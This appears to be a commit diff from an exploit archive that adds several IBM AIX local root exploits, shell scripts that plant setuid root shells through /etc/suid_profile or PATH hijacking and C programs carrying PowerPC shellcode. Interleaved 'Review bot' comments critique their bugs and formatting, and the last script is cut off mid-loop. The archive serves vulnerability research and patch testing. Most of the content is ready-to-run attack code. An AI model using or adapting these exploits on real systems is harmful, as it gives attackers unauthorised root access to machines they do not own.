# Tested on: IBM AIX 6.1
# CVE: CVE-2013-4011
echo '
mm mmmmm m m
## # # #
# # # ##
#mm# # m""m
# # mm#mm m" "m
'
echo "[*] AIX root privilege escalation"
echo "[*] Kristian Erik Hermansen"
echo "[*] https://linkedin.com/in/kristianhermansen"
echo "
+++++?????????????~.:,.:+???????????++++
+++++???????????+...:.,.,.=??????????+++
+++???????????~.,:~=~:::..,.~?????????++
+++???????????:,~==++++==~,,.?????????++
+++???????????,:=+++++++=~:,,~????????++
++++?????????+,~~=++++++=~:,,:????????++
+++++????????~,~===~=+~,,::,:+???????+++
++++++???????=~===++~~~+,,~::???????++++
++++++++?????=~=+++~~~:++=~:~+???+++++++
+++++++++????~~=+++~+=~===~~:+??++++++++
+++++++++?????~~=====~~==~:,:?++++++++++
++++++++++????+~==:::::=~:,+??++++++++++
++++++++++?????:~~=~~~~~::,??+++++++++++
++++++++++?????=~:~===~,,,????++++++++++
++++++++++???+:==~:,,.:~~..+??++++++++++
+++++++++++....==+===~~=~,...=?+++++++++
++++++++,........~=====..........+++++++
+++++................................++=
=+:....................................=
"
TMPDIR=/tmp
TAINT=${TMPDIR}/arp
RSHELL=${TMPDIR}/r00t-sh
cat > ${TAINT} <<-!
#!/bin/sh
cp /bin/sh ${RSHELL}
chown root ${RSHELL}
chmod 4555 ${RSHELL}
!
chmod 755 ${TAINT}
PATH=.:${PATH}
export PATH
cd ${TMPDIR}
/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null
if [ -e ${RSHELL} ]; then
echo "[+] Access granted. Don't be evil..."
${RSHELL}
else
echo "[-] Exploit failed. Try some 0day instead..."
fi
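Review bot: the `#!/bin/sh` line sits on line 3, after the two `# Exploit-DB Note` comment lines, so it is not a shebang and the kernel will not honour it; the file only runs when invoked through a shell explicitly. Move the Exploit-DB note below the shebang, into the header block that follows it.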

exploits/aix/local/30399.c Normal file

@ -0,0 +1,185 @@
// source: https://www.securityfocus.com/bid/25075/info
IBM AIX is prone to a local, stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input to a program that is installed setuid-superuser.
Local attackers can exploit this issue to execute arbitrary code with superuser privileges. Failed attacks will likely cause denial-of-service conditions.
/* 07/2007: public release
*
* qaaz@aix:~$ ./aix-capture
* --------------------------------
* AIX capture Local Root Exploit
* By qaaz
* --------------------------------
* bash: no job control in this shell
* bash-3.00#
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/capture"
#define VALCNT 40
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x, y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
char *args[] = { TARGET, "/dev/null", NULL };
char *envs[] = { pad, bsh, egg, NULL };
int ptm, pts, pi[2];
pid_t child;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
if (!envp[0]) {
dup2(3, 0);
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
} else if (argc && !strcmp(argv[0], "bsh")) {
char i, ch;
ulong addr = get_addr(argv, envp, args, envs);
printf("\x1b[");
for (i = 0; i < VALCNT; i++)
printf("%lu;", addr);
printf("0A\n");
fflush(stdout);
while (read(0, &ch, 1) == 1)
write(1, &ch, 1);
exit(0);
}
printf("--------------------------------\n");
printf(" AIX capture Local Root Exploit\n");
printf(" By qaaz\n");
printf("--------------------------------\n");
if (pipe(pi) < 0) {
perror("[-] pipe");
exit(1);
}
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
(pts = open(ttyname(ptm), O_RDWR)) < 0) {
perror("[-] pty");
exit(1);
}
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pts, 0);
dup2(pts, 1);
dup2(pts, 2);
dup2(pi[0], 3);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
close(pi[0]);
close(pts);
sleep(1);
read(ptm, buf, sizeof(buf));
write(ptm, " ", 1);
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
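Review bot: the two description sentences after `// source:` (`IBM AIX is prone to ...` and `Local attackers can ...`) are bare prose inside a `.c` file, so the file does not compile as committed; wrap them in a `/* */` block. Apart from that header the program is a near-verbatim copy of `exploits/aix/local/4231.c` later in this commit (same `qaazcode`, `shell()` and `get_addr()`), the only code difference being that `get_addr()` is called inside the `bsh` branch here and before the branches there.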

exploits/aix/local/333.c Normal file

@ -0,0 +1,160 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char prog[100]="/usr/dt/bin/dtterm";
char prog2[30]="dtterm";
extern int execv();
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
/*The program*/
main(int argc,char **argv,char **env)
{
/*The code*/
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* disassembly
7c0802a6 mfspr r0,LR
9421fbb0 stu SP,-1104(SP) --get stack
90010458 st r0,1112(SP)
3c60f019 cau r3,r0,0xf019 --CTR
60632c48 lis r3,r3,11336 --CTR
90610440 st r3,1088(SP)
3c60d002 cau r3,r0,0xd002 --TOC
60634c0c lis r3,r3,19468 --TOC
90610444 st r3,1092(SP)
3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
6063696e lis r3,r3,26990
90610438 st r3,1080(SP)
3c602f73 cau r3,r0,0x2f73
60636801 lis r3,r3,26625
3863ffff addi r3,r3,-1
9061043c st r3,1084(SP) --terminate with 0
30610438 lis r3,SP,1080
7c842278 xor r4,r4,r4 --argv=NULL
80410440 lwz RTOC,1088(SP)
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/
#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET=0;
int dobuf=0;
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int ch;
unsigned int reta; /* return address */
int corr=1000;
char *args[4];
char *arg1="-ms";
char *newenv[8];
int startwith=0;
mn=200;
max=300;
if (argc>1)
corr = atoi(argv[1]);
pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;
if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
perror("Bad parameters");
exit(1);
}
#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);
reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;
for(nop=0;nop<mn;nop++)
buf[nop]=startwith ? reta : 0x4ffffb82; /*NOP*/
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
|| !(reta && 0xff000000))
{
perror("Return address has zero");exit(5);
}
while(i++<max)
buf[i]=reta;
buf[i]=0;
for(i=0;i<max-1;i++)
frame[i]=reta;
frame[i]=0;
if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};
/* 4 vars 'cause the correct one should be aligned at 4bytes boundary */
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;
args[0]=prog2;
args[1]=arg1;
args[2]=(char*)&frame[0]; /* Just frame pointers */
puts("Start...");/*Here we go*/
execve(prog,args,newenv);
perror("Error executing execve \n");
/* Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711*/
}
/*-------sometimes this helps-----------------------
#!/bin/ksh
L=20
O=40
while [ $L -lt 12000 ]
do
echo $L
L=`expr $L + 144`
./a.out $L
done
/str0ke
*/
// milw0rm.com [1997-05-27]
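Review bot: the zero-byte guard `if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000) || !(reta && 0xff000000))` uses logical `&&` for the upper three bytes, so those three terms reduce to `!(reta != 0)` and only the low byte is actually tested; the intent is plainly bitwise `&` throughout. `main(int argc,char **argv,char **env)` also has no return type, which current compilers reject by default. The stray `/str0ke` line inside the ksh helper comment at the end looks like a signature pasted into the script body.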

exploits/aix/local/335.c Normal file

@ -0,0 +1,161 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char prog[100]="/usr/sbin/lquerylv";
char prog2[30]="lquerylv";
extern int execv();
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
/*The program*/
main(int argc,char **argv,char **env)
{
/*The code*/
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* disassembly
7c0802a6 mfspr r0,LR
9421fbb0 stu SP,-1104(SP) --get stack
90010458 st r0,1112(SP)
3c60f019 cau r3,r0,0xf019 --CTR
60632c48 lis r3,r3,11336 --CTR
90610440 st r3,1088(SP)
3c60d002 cau r3,r0,0xd002 --TOC
60634c0c lis r3,r3,19468 --TOC
90610444 st r3,1092(SP)
3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
6063696e lis r3,r3,26990
90610438 st r3,1080(SP)
3c602f73 cau r3,r0,0x2f73
60636801 lis r3,r3,26625
3863ffff addi r3,r3,-1
9061043c st r3,1084(SP) --terminate with 0
30610438 lis r3,SP,1080
7c842278 xor r4,r4,r4 --argv=NULL
80410440 lwz RTOC,1088(SP)
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/
#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET=0;
int dobuf=0;
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int ch;
unsigned int reta; /* return address */
int corr=4600;
char *args[4];
char *arg1="-L";
char *newenv[8];
int startwith=0;
mn=100;
max=280;
if (argc>1)
corr = atoi(argv[1]);
pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;
if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
perror("Bad parameters");
exit(1);
}
#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);
reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;
for(nop=0;nop<mn;nop++)
buf[nop]=startwith ? reta : 0x4ffffb82; /*NOP*/
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
|| !(reta && 0xff000000))
{
perror("Return address has zero");exit(5);
}
while(i++<max)
buf[i]=reta;
buf[i]=0;
for(i=0;i<max-1;i++)
frame[i]=reta;
frame[i]=0;
if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};
/* 4 vars 'cause the correct one should be aligned at 4bytes boundary */
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;
args[0]=prog2;
args[1]=arg1;
args[2]=(char*)&frame[0]; /* Just frame pointers */
puts("Start...");/*Here we go*/
execve(prog,args,newenv);
perror("Error executing execve \n");
/* Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711
*/
}
/*
----------cut here---------
----------sometimes this helps-----------------
#!/bin/ksh
L=100
O=40
while [ $L -lt 12000 ]
do
echo $L
L=`expr $L + 42`
./a.out $L
done */
// milw0rm.com [1997-05-26]
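Review bot: same `&&`-for-`&` mistake as in `333.c`: in `!(reta && 0xff00) || !(reta && 0xff0000) || !(reta && 0xff000000)` only the `reta & 0xff` term checks a byte. This file is otherwise a copy of `333.c` with `prog`, `prog2`, `arg1`, `corr`, `mn` and `max` changed; both copies carry the same bug and the same untyped `main`, which argues for one source that takes the target and offsets as parameters.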


@ -0,0 +1,55 @@
Vulnerability title: Privilege Escalation in IBM AIX
CVE: CVE-2014-3977
Vendor: IBM
Product: AIX
Affected version: 6.1.8 and later
Fixed version: N/A
Reported by: Tim Brown
Details:
It has been identified that libodm allows privilege escalation via
arbitrary file writes with elevated privileges (utilising SetGID and
SetUID programs). The following will cause a new file /etc/pwned to be
created with permissions of rw-rw-rw:
#include <stdlib.h> #include <unistd.h> #include <stdio.h> int
pwnedflag; int main(int argc, char **argv) { pwnedflag = 0; umask(0); if
(fork()) { setenv("ODMERR", "1", 1); while (!pwnedflag) { if
(!access("/etc/pwned", F_OK)) { pwnedflag = 1; printf("Race
won...\r\n"); unsetenv("ODMERR"); exit(EXIT_SUCCESS); }
system("/usr/bin/at"); } } else { while (!pwnedflag) {
symlink("/etc/pwned", "ODMTRACE0"); if (!access("/etc/pwned", F_OK)) {
pwnedflag = 1; printf("Race won...\r\n"); exit(EXIT_SUCCESS); }
unlink("ODMTRACE0"); } } }
It is believed this is a side affect of CVE-2012-2179 being incorrectly
resolved. As understood, prior to CVE-2012-2179 being fixed, libodm
would simply open ODMTRACE0 and write to it assuming ODMERR=1. It is
believed that the fix that was applied was to check for the presence of
ODMTRACE0 and increment until no file was found. It is necessary to win
a time of check, time of use race condition by creating a symlink from
the ODMTRACE0 in the current working directory to the target file under
hoping that the link will be added after the check has been made that
ODMTRACE0 does not exist.
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3977/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
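Review bot: the C proof-of-concept between `Details:` and `It is believed ...` has been collapsed onto run-on lines, including a line break inside the string literal `"Race` / `won...\r\n"`, so it cannot be compiled as shown; reflow it one statement per line. In the prose, "side affect" should be "side effect", and "to the target file under hoping that the link will be added after the check" has lost a word around "under". "Fixed version: N/A" next to "Affected version: 6.1.8 and later" leaves readers without a fix level to compare against; link the IBM fix if one has since shipped.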


@ -0,0 +1,22 @@
IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0day
Let's kill some more bugs today and force vendor improvement :)
"""
$ cat /tmp/su
#!/bin/sh
/bin/sh
$ chmod +x /tmp/su
$ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd
# /usr/bin/whoami
root
"""
References:
https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multiprocessing
http://www-01.ibm.com/support/knowledgecenter/SSPHQG_6.1.0/com.ibm.hacmp.admngd/ha_admin_clpasswd.htm
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen
--
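Review bot: the file carries no date, CVE, affected-version or fix information, only a transcript and two links, so the "0day" in the title cannot be placed in time. The transcript does show the point that matters for defenders, and it deserves a sentence of its own: `PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd` picks up `/tmp/su`, i.e. the setuid utility resolves `su` through the caller's `PATH` rather than an absolute path.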

exploits/aix/local/38576.sh Executable file

@ -0,0 +1,27 @@
#!/bin/sh
#
# Exploit Title: AIX 7.1 lquerylv privilege escalation
# Date: 2015.10.30
# Exploit Author: S2 Crew [Hungary]
# Vendor Homepage: www.ibm.com
# Software Link: -
# Version: -
# Tested on: AIX 7.1 (7100-02-03-1334)
# CVE : CVE-2014-8904
#
# From file writing to command execution ;)
#
export _DBGCMD_LQUERYLV=1
umask 0
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv
cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF
/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid
/tmp/r00tshell
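Review bot: the header fields `# Software Link: -` and `# Version: -` are left empty while `# Tested on:` is filled in; fill them or drop them. The script also leaves `/tmp/DEBUGCMD` (a symlink to `/etc/suid_profile`) and a world-writable `/etc/suid_profile` (created under `umask 0`) in place when it finishes, unlike `40709.sh` later in this commit whose payload removes `/etc/suid_profile`; a test host stays exposed until both are cleaned up.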

exploits/aix/local/40709.sh Executable file

@ -0,0 +1,62 @@
#!/usr/bin/sh
#
# AIX lsmcode local root exploit.
#
# Affected: AIX 6.1/7.1/7.2.0.2
#
# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/
#
# lqueryroot.sh by @hxmonsegur [2016 //RSL]
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
if [ ! -x "/usr/sbin/lsmcode" ]; then
echo "[-] lsmcode isn't executable. Exploit failed."
exit 1
fi
echo "[*] [lsmcode] AIX 6.1/7.1/7.2.0.2 Privilege escalation by @hxmonsegur //RSL"
echo "[*] Current id: `/usr/bin/id`"
echo "[*] Exporting variables"
MALLOCOPTIONS=buckets
MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
export MALLOCOPTIONS MALLOCBUCKETS
echo "[*] Setting umask to 000"
umask 000
echo "[*] Executing vulnerable binary [lsmcode]"
/usr/sbin/lsmcode -c >/dev/null 2>&1
if [ ! -e "/etc/suid_profile" ]; then
echo "[-] /etc/suid_profile does not exist and exploit failed."
exit 1
fi
echo "[*] Cleaning up /etc/suid_profile"
echo > /etc/suid_profile
echo "[*] Preparing escalation"
cat << EOF >/etc/suid_profile
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm /etc/suid_profile
EOF
echo "[*] Cleaning up environment variables"
unset MALLOCBUCKETS MALLOCOPTIONS
echo "[*] Escalating"
/usr/bin/ibstat -a >/dev/null 2>&1
if [ ! -e "$ROOTSHELL" ]; then
echo "[-] Rootshell does not exist and exploit failed."
exit 1
fi
echo "[*] Executing rootshell"
$ROOTSHELL
echo "[*] Make sure to remove $ROOTSHELL"
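Review bot: the attribution line `# lqueryroot.sh by @hxmonsegur [2016 //RSL]` is copied from the lquerylv exploit (`40710.sh` in this commit); this file targets `lsmcode`, so the script name is wrong. Because `rm /etc/suid_profile` lives inside the payload, on the failure path (`ibstat` does not create `$ROOTSHELL`) the world-writable `/etc/suid_profile` created under `umask 000` is left behind; the `[-] Rootshell does not exist` branch should remove it before exiting.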

exploits/aix/local/40710.sh Executable file

@ -0,0 +1,131 @@
#!/usr/bin/sh
#
# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04)
#
# This exploit takes advantage of known issues with debugging functions
# within the AIX linker library. We are taking advantage of known
# functionality, and focusing on badly coded SUID binaries which do not
# adhere to proper security checks prior to seteuid/open/writes.
#
# The CVEs we will be taking advantage of:
# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows
# local users to create or overwrite arbitrary files via a symlink attack on
# the log file associated with the MALLOCDEBUG environment variable.
#
# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does
# not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE
# environment variables, which allows local users to gain privileges by
# leveraging a setuid-root program to create an arbitrary root-owned file
# with world-writable permissions, related to libC.a (aka the XL C++ runtime
# library) in AIX 5.3 and libc.a in AIX 6.1.
#
# - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary
# File Writes In IBM AIX.
#
# In each instance of the aforementioned CVEs, IBM merely patched the binaries
# which were reported in the original reports as being used for escalation of
# the vulnerabilities. This allowed for the lquerylv binary to slip by their
# patches and become an attack vector.
#
# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/
#
# lqueryroot.sh by @hxmonsegur [2016 //RSL]
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
APP=$0
function usage
{
echo "Usage: $APP [1] | [2] | [3]"
echo
echo "1 - MALLOCDEBUG file write -> escalation"
echo "2 - _LIB_INIT_DBG_FILE file write -> escalation"
echo "3 - MALLOCBUCKETS file write -> escalation"
echo
echo "[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL"
exit
}
function CVE20091786
{
echo "[*] Exporting MALLOCDEBUG environment variable"
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/etc/suid_profile
export MALLOCTYPE MALLOCDEBUG
}
function CVE20092669
{
echo "[*] Exporting _LIB_INIT_DBG_FILE environment variable"
_LIB_INIT_DBG=1
_LIB_INIT_DBG_FILE=/etc/suid_profile
export _LIB_INIT_DBG _LIB_INIT_DBG_FILE
}
function CVE20143074
{
echo "[*] Exporting MALLOCBUCKETS environment variable"
MALLOCOPTIONS=buckets
MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
export MALLOCOPTIONS MALLOCBUCKETS
}
if [ -z "$1" ]; then
usage
exit 1
fi
while [ "$1" != "" ]; do
case $1 in
1 ) CVE20091786;;
2 ) CVE20092669;;
3 ) CVE20143074;;
* ) usage
break;;
esac
shift
done
if [ ! -x "/usr/sbin/lquerylv" ]; then
echo "[-] lquerylv isn't executable. Tough luck."
exit 1
fi
echo "[*] Setting umask to 000"
umask 000
echo "[*] Execute our vulnerable binary"
/usr/sbin/lquerylv >/dev/null 2>&1
if [ ! -e "/etc/suid_profile" ]; then
echo "[-] /etc/suid_profile does not exist and exploit failed."
exit 1
fi
echo "[*] Cleaning up /etc/suid_profile"
echo > /etc/suid_profile
echo "[*] Current id: `/usr/bin/id`"
echo "[*] Adding payload"
cat << EOF >/etc/suid_profile
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm /etc/suid_profile
EOF
echo "[*] Unsetting env"
unset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE
echo "[*] Executing ibstat for fun and profit"
/usr/bin/ibstat -a >/dev/null 2>&1
if [ ! -e "$ROOTSHELL" ]; then
echo "[-] Rootshell does not exist and exploit failed."
exit 1
fi
echo "[*] Executing rootshell"
$ROOTSHELL
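Review bot: in the argument loop, `* ) usage` followed by `break;;` is unreachable since `usage` ends with `exit`; drop the `break` or make `usage` return. Because the loop keeps `shift`ing, passing `1 2 3` exports all three sets of variables at once; if trying all three file-write paths in one run is intended, say so in `usage`, otherwise reject more than one mode. `function name` syntax is ksh-specific, which matches AIX's `/usr/bin/sh`, but the header should state that dependency for readers running it elsewhere.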

exploits/aix/local/40950.sh Executable file

@ -0,0 +1,94 @@
#!/usr/bin/sh
#
# CVE-2016-8972/bellmailroot.sh: IBM AIX Bellmail local root
#
# Affected versions:
# AIX 6.1, 7.1, 7.2
# VIOS 2.2.x
#
# Fileset Lower Level Upper Level KEY
# ---------------------------------------------------------
# bos.net.tcp.client 6.1.9.0 6.1.9.200 key_w_fs
# bos.net.tcp.client 7.1.3.0 7.1.3.47 key_w_fs
# bos.net.tcp.client 7.1.4.0 7.1.4.30 key_w_fs
# bos.net.tcp.client_core 7.2.0.0 7.2.0.1 key_w_fs
# bos.net.tcp.client_core 7.2.1.0 7.2.1.0 key_w_fs
#
# Ref: http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc
# Ref: https://rhinosecuritylabs.com/2016/12/21/unix-nostalgia-aix-bug-hunting-part-2-bellmail-privilege-escalation-cve-2016-8972/
# @hxmonsegur //RSL - https://www.rhinosecuritylabs.com
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
VULNBIN=/usr/bin/bellmail
SUIDPROFILE=/etc/suid_profile
function ESCALATE
{
echo "[*] Preparing escalation"
$VULNBIN >/dev/null 2>&1 <<EOD
s /etc/suid_profile
EOD
if [ ! -w $SUIDPROFILE ]; then
echo "[-] $SUIDPROFILE is not writable. Exploit failed."
exit 1
fi
echo "[*] Clearing out $SUIDPROFILE"
echo > /etc/suid_profile
echo "[*] Injecting payload"
cat << EOF >$SUIDPROFILE
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm -f $SUIDPROFILE
EOF
echo "[*] Executing SUID to leverage privileges"
/usr/bin/ibstat -a >/dev/null 2>&1
if [ ! -x $ROOTSHELL ]; then
echo "[-] Root shell does not exist or is not executable. Exploit failed."
exit 1
fi
echo "[*] Escalating to root.."
$ROOTSHELL
echo "[*] Make sure to remove $ROOTSHELL"
}
echo "[*] IBM AIX 6.1, 7.1, 7.2 Bellmail Local root @hxmonsegur//RSL"
$VULNBIN -e
if [ $? -eq 0 ]
then
ESCALATE
echo "[*] Make sure to remove $ROOTSHELL"
exit 0
fi
echo "[*] Sending mail to non-existent user, force a bounce within ~minute"
/usr/bin/mail nonexistentuser <<EOD
.
.
.
EOD
echo "[*] Waiting for mail to come in."
while true
do
$VULNBIN -e
if [ $? -eq 0 ]
then
echo "[*] Mail found"
ESCALATE
break
else
echo "[-] Mail not received yet. Sleeping."
